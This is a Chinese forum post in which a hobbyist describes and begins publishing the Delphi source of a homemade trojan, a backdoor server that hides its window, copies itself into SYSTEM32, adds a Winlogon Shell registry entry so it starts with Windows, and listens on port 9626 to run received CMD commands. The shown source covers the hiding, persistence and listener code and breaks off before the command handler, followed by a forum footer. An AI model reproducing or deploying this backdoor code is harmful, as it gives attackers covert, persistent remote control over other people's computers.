刚学电脑时很喜欢网络安全，看着高手们写的一个又一个攻击工具，自己也总想努力去学好编程去写属于自己的程序。学Delphi快一年了，感觉什么都没学到，惭愧啊。今晚突然想学着写木马，于是手忙脚乱的敲了点代码，超简单，愿自己能越写越好!!!

　　程序跟传统木马一样，分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面，并在注册表添加一自动行启动项，打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行，最后把回显传送回客户端。客户端很简单，跟服务端连接成功后，输入命令点执行，正常的话可以收到服务端的执行结果了。

　　

 

　　源码如下：

　　////Server.pas//////////////

　　unit UtMain;

　　////////////////////////////////////

　　//////////BY lanyus////////////////

　　////////Email:greathjw@163.com////

　　////////QQ:231221////////////////

　　///部分代码从网上收集///////////

　　////////////////////////////////

　　interface

　　uses

　　Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

　　Dialogs, Registry, ScktComp, StdCtrls;

　　type

　　TFmMain = class(TForm)

　　SS: TServerSocket;

　　Memo1: TMemo;

　　procedure FormCreate(Sender: TObject);

　　procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);

　　procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);

　　private

　　{ Private declarations }

　　public

　　{ Public declarations }

　　end;

　　var

　　FmMain: TFmMain;

　　reg:TRegistry;

　　implementation

　　{$R *.dfm}

　　procedure TFmMain.FormCreate(Sender: TObject);

　　var

　　sysdir:array[0..50] of char;

　　begin

　　Application.ShowMainForm:=False;

　　FmMain.Left:=-200; //运行不显示窗口

　　reg:=TRegistry.Create;

　　reg.RootKey:=HKEY_LOCAL_MACHINE;

　　reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);

　　if reg.ReadString('Shell')<> 'EXPlorer.exe Lysvr.exe' then

　　reg.WriteString('Shell','EXPlorer.exe Lysvr.exe'); //建立开机启动项

　　reg.Free;

　　GetSystemDirectory(sysdir,50);

　　if not FileExists(sysdir+'\Lysvr.exe') then

　　copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

　　SS.Port:=9626;

　　try

　　SS.Active:=True;

　　except

　　end;

　　end;

　　procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);

　　begin

　　Socket.SendText('连接成功'); //发现有连接时回传‘连接成功 ’

　　end;

　　procedure TFmMain.SSCl

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛 https://bbs.txwb.com 关注天下网吧微信/下载天下网吧APP/天下网吧小程序，一起来超精彩